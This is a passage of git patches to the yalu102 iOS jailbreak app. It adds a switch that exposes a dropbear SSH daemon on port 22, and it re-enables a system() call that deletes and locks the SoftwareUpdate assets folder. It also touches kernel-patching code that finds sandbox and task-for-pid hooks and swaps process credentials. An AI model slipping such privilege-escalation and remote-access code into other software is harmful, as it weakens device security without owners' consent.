(nonatomic, weak) IBOutlet UIButton *dope; @end @@ -26,15 +27,15 @@ - (void)viewDidLoad { struct utsname u = { 0 }; uname(&u); if (strstr(u.version, "MarijuanARM")) { - [dope setEnabled:NO]; - [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; + [self.dope setEnabled:NO]; + [self.dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; return; } self.offsets = [YAKernelOffsets offsetsForCurrentDevice]; if (!self.offsets) { - [dope setEnabled:NO]; - [dope setTitle:@"kernel unsupported" forState:UIControlStateDisabled]; + [self.dope setEnabled:NO]; + [self.dope setTitle:@"kernel unsupported" forState:UIControlStateDisabled]; return; } } @@ -54,11 +55,11 @@ - (IBAction)yolo:(UIButton*)sender { rootvnode_offset = self.offsets->rootvnode_offset; jailbreak(); - [dope setEnabled:NO]; - [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; + [self.dope setEnabled:NO]; + [self.dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; } else { - [dope setTitle:@"failed, retry?" forState:UIControlStateNormal]; + [self.dope setTitle:@"failed, retry?" forState:UIControlStateNormal]; } } From f072235e684be0ed8ec9acf615a7c6f16b4518c6 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Mon, 30 Jan 2017 15:51:03 +0100 Subject: [PATCH 32/34] Add switch for enabling remote SSH access --- yalu102/Base.lproj/Main.storyboard | 51 ++++++++++++++++++++++++++---- yalu102/ViewController.m | 23 +++++++++++--- yalu102/jailbreak.h | 2 ++ yalu102/jailbreak.m | 9 ++++++ 4 files changed, 73 insertions(+), 12 deletions(-) diff --git a/yalu102/Base.lproj/Main.storyboard b/yalu102/Base.lproj/Main.storyboard index 0b7bd8a..5dee59f 100644 --- a/yalu102/Base.lproj/Main.storyboard +++ b/yalu102/Base.lproj/Main.storyboard @@ -1,6 +1,6 @@ - - + + @@ -19,11 +19,11 @@ - + + + + - + + + diff --git a/yalu102/ViewController.m b/yalu102/ViewController.m index 8440a41..86dc1e1 100644 --- a/yalu102/ViewController.m +++ b/yalu102/ViewController.m @@ -16,6 +16,8 @@ @interface ViewController () @property (nonatomic, strong) YAKernelOffsets *offsets; @property (nonatomic, weak) IBOutlet UIButton *dope; +@property (nonatomic, weak) IBOutlet UIView *sshView; +@property (nonatomic, weak) IBOutlet UISwitch *sshSwitch; @end @@ -38,6 +40,13 @@ - (void)viewDidLoad { [self.dope setTitle:@"kernel unsupported" forState:UIControlStateDisabled]; return; } + + // load settings + { + NSUserDefaults *defaults = [NSUserDefaults standardUserDefaults]; + [self.sshSwitch setOn:[defaults boolForKey:@"YAEnableRemoteSSH"]]; + [self.sshView setHidden:NO]; + } } - (IBAction)yolo:(UIButton*)sender { @@ -47,25 +56,29 @@ - (IBAction)yolo:(UIButton*)sender { taskPortResult:&_tfp0 kernelBaseResult:&_kernbase]; if (ok) { + // store settings + { + NSUserDefaults *defaults = [NSUserDefaults standardUserDefaults]; + [defaults setBool:self.sshSwitch.on forKey:@"YAEnableRemoteSSH"]; + [defaults synchronize]; + } + // via jailbreak.h tfp0 = _tfp0; kernbase = _kernbase; slide = kernbase - 0xFFFFFFF007004000; allprocs_offset = self.offsets->allproc_offset; rootvnode_offset = self.offsets->rootvnode_offset; + cfg_enable_remote_ssh = self.sshSwitch.on; jailbreak(); [self.dope setEnabled:NO]; [self.dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; + [self.sshView setHidden:YES]; } else { [self.dope setTitle:@"failed, retry?" forState:UIControlStateNormal]; } } -- (void)didReceiveMemoryWarning { - [super didReceiveMemoryWarning]; - // Dispose of any resources that can be recreated. -} - @end diff --git a/yalu102/jailbreak.h b/yalu102/jailbreak.h index 591864a..735df7f 100644 --- a/yalu102/jailbreak.h +++ b/yalu102/jailbreak.h @@ -1,6 +1,7 @@ #pragma once +#import #import #import @@ -9,5 +10,6 @@ extern uint64_t kernbase; extern uint64_t slide; extern uint64_t allprocs_offset; extern uint64_t rootvnode_offset; +extern bool cfg_enable_remote_ssh; void jailbreak(void); diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index b6fd8a9..7b3b6b0 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -30,6 +30,7 @@ uint64_t kernbase; uint64_t allprocs_offset; uint64_t rootvnode_offset; +bool cfg_enable_remote_ssh; void copyin(void* to, uint64_t from, size_t size) { mach_vm_size_t outsize = size; @@ -901,6 +902,14 @@ void jailbreak(void) { copyfile([dropbearPlistPath UTF8String], "/Library/LaunchDaemons/dropbear.plist", 0, COPYFILE_ALL); chmod("/Library/LaunchDaemons/dropbear.plist", 0644); chown("/Library/LaunchDaemons/dropbear.plist", 0, 0); + if (cfg_enable_remote_ssh) { + NSLog(@"enabling SSH remote access"); + NSMutableDictionary* md = [[NSMutableDictionary alloc] initWithContentsOfFile:@"/Library/LaunchDaemons/dropbear.plist"]; + NSMutableArray *a = [NSMutableArray arrayWithArray:[md valueForKey:@"ProgramArguments"]]; + a[4] = @"22"; + [md setValue:a forKey:@"ProgramArguments"]; + [md writeToFile:@"/Library/LaunchDaemons/dropbear.plist" atomically:YES]; + } } } From b7a300f9e5d1cb0b395cee5eacb3254e4b306f86 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Mon, 30 Jan 2017 15:58:19 +0100 Subject: [PATCH 33/34] Reenable original OTA patch --- yalu102/jailbreak.m | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index 7b3b6b0..82e9c07 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -821,12 +821,17 @@ void jailbreak(void) { } { + /* + persistent filesystem modifications + */ + NSBundle *resBundle = [NSBundle mainBundle]; pid_t tmp_pid; const char** tmp_args; int installedFd = open("/.installed_yaluX", O_RDONLY); + // extract root file system patches if (installedFd == -1) { NSString* tarPath = [resBundle pathForResource:@"tar" ofType:nil]; unlink("/bin/tar"); @@ -880,15 +885,15 @@ void jailbreak(void) { close(installedFd); } + + // install usermode reload script { NSString* reloadPath = [resBundle pathForResource:@"reload" ofType:nil]; unlink("/usr/libexec/reload"); copyfile([reloadPath UTF8String], "/usr/libexec/reload", 0, COPYFILE_ALL); chmod("/usr/libexec/reload", 0755); chown("/usr/libexec/reload", 0, 0); - } - { NSString* reloadPlistPath = [resBundle pathForResource:@"0.reload.plist" ofType:nil]; unlink("/Library/LaunchDaemons/0.reload.plist"); copyfile([reloadPlistPath UTF8String], "/Library/LaunchDaemons/0.reload.plist", 0, COPYFILE_ALL); @@ -896,6 +901,7 @@ void jailbreak(void) { chown("/Library/LaunchDaemons/0.reload.plist", 0, 0); } + // install SSH agent { NSString* dropbearPlistPath = [resBundle pathForResource:@"dropbear.plist" ofType:nil]; unlink("/Library/LaunchDaemons/dropbear.plist"); @@ -919,9 +925,10 @@ void jailbreak(void) { chmod("/private/var/mobile", 0777); chmod("/private/var/mobile/Library", 0777); chmod("/private/var/mobile/Library/Preferences", 0777); - system("rm -rf /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; touch /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; chmod 000 /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; chown 0:0 /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate"); */ + system("rm -rf /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; touch /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; chmod 000 /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; chown 0:0 /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate"); + system("(echo 'really jailbroken'; /bin/launchctl load /Library/LaunchDaemons/0.reload.plist)&"); WriteAnywhere64(bsd_task+0x100, orig_cred); From c23a1af53ef854ece5de3e9070ace4aadf64df06 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Tue, 31 Jan 2017 14:09:29 +0100 Subject: [PATCH 34/34] Cosmetics --- yalu102/jailbreak.m | 20 +++++++++++--------- 1 file changed, 11 insertions(+), 9 deletions(-) diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index 82e9c07..aa04351 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -199,7 +199,8 @@ void jailbreak(void) { kerndumpbase = seg->vmaddr; } kerndumpsize += seg->vmsize; - } else if (load_cmd->cmd == LC_UNIXTHREAD) { + } + else if (load_cmd->cmd == LC_UNIXTHREAD) { struct { unsigned long cmd; /* LC_THREAD or LC_UNIXTHREAD */ unsigned long cmdsize; /* total size of this command */ @@ -539,8 +540,8 @@ void jailbreak(void) { { uint64_t endf = prelink_base+prelink_size; uint64_t ends = whole_size - (endf - whole_base); - uint32_t* opps_stream = whole_dump + endf - whole_base; - uint64_t* ptr_stream = whole_dump + endf - whole_base; + uint32_t* opps_stream = (uint32_t*)(whole_dump + endf - whole_base); + uint64_t* ptr_stream = (uint64_t*)(whole_dump + endf - whole_base); uint64_t lastk = 0; int streak = 0; @@ -567,11 +568,11 @@ void jailbreak(void) { } if (streak == 9) { - char* sbstr = whole_dump + lastk + endf - whole_base - 8; + uint8_t* sbstr = whole_dump + lastk + endf - whole_base - 8; uint64_t extract_attr_recipe = *(uint64_t*)(sbstr + 72 * 0x20 + 8 /*fptr*/); - uint32_t* opcode_stream = extract_attr_recipe - whole_base + whole_dump; + uint32_t* opcode_stream = (uint32_t*)(extract_attr_recipe - whole_base + whole_dump); int l = 0; while (1) { @@ -611,7 +612,7 @@ void jailbreak(void) { uint64_t tfp = *(uint64_t*)(sbstr + 45 * 0x20 + 8 /*fptr*/); - opcode_stream = tfp - whole_base + whole_dump; + opcode_stream = (uint32_t*)(tfp - whole_base + whole_dump); int cbz = 0; while (1) { @@ -627,10 +628,11 @@ void jailbreak(void) { } - /* - nonceenabler - */ { + /* + nonceenabler + */ + uint64_t endf = prelink_base+prelink_size; uint64_t ends = whole_size - (endf - whole_base); char* sbstr = memmem(whole_dump + endf - whole_base, ends, "com.apple.System.boot-nonce", strlen("com.apple.System.boot-nonce"));